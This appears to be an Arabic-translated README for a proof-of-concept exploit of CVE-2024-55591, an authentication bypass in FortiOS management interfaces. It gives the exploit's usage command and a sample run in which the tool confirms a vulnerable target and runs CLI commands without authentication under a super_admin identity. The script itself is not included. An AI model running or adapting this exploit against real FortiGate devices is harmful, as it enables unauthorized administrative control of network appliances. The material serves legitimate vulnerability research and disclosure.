
إثبات مفهوم لاستغلال CVE-2024-55591، يوضح تجاوز المصادقة في واجهات إدارة FortiOS عبر حالة سباق WebSocket لتنفيذ أوامر CLI بدون مصادقة.
إثبات مفهوم لتجاوز المصادقة في Fortinet FortiOS
انظر منشور مدونتنا للتفاصيل التقنية
python CVE-2024-55591-PoC.py --host 192.168.1.5 --port 443 --command "get system status" --user watchTowr --ssl
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \\| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \\___| Y | |( <_> \ / | | \
\/\_/ (____ |__| \\\\___ |___|__|__ | \\__ / \\/\_/ |__|
\\ \\ \\
CVE-2024-55591.py
(*) Fortinet FortiOS Authentication Bypass (CVE-2024-55591) POC by watchTowr
- Sonny , watchTowr ([email protected])
CVEs: [CVE-2024-55591]
[*] Checking if target is a FortiOS Management interface
[*] Target is confirmed as a FortiOS Management interface
[*] Target is confirmed as vulnerable to CVE-2024-55591, proceeding with exploitation
Output from server: �m"watchTowr" "admin" "watchTowr" "super_admin" "watchTowr" "watchTowr" [13.37.13.37]:1337 [13.37.13.37]:1337
Output from server: �
get system status
Output from server: �~�FAKESERIAL # "Local_Process_Access" "Local_Process_Access" "root" "" "" "none" [x.x.x.x]:54546 [x.x.x.x]:443
Unknown action 0
FAKESERIAL #
FAKESERIAL # get system status
Version: FortiGate-VM64-AWS v7.0.16,build0667,241001 (GA.M)
Security Level: High
Firmware Signature: certified
Virus-DB: 1.00000(2018-04-09 18:07)
هذا السكريبت هو إثبات مفهوم لـ CVE-2024-55591، يستهدف واجهات إدارة FortiOS (Fortigate). من خلال إنشاء اتصالات WebSocket بالقوة الغاشمة لخلق حالة سباق (race condition) إلى جانب تجاوز المصادقة، يمكن إرسال أوامر CLI الخاصة بـ FortiOS بدون مصادقة. المزيد من التفاصيل موصوفة في منشور مدونتنا.
مزيد من التفاصيل في تنبيه Fortinet
هذا السكريبت ليس مصممًا للعمل مع FortiProxy، حيث تتحقق الفحوصات الأولية مما إذا كان المثيل هو واجهة إدارة FortiGate، لكن من المفترض أن التقنية الأساسية قابلة للتطبيق على أجهزة FortiProxy المتأثرة.
للحصول على أحدث الأبحاث الأمنية، تابع فريق watchTowr Labs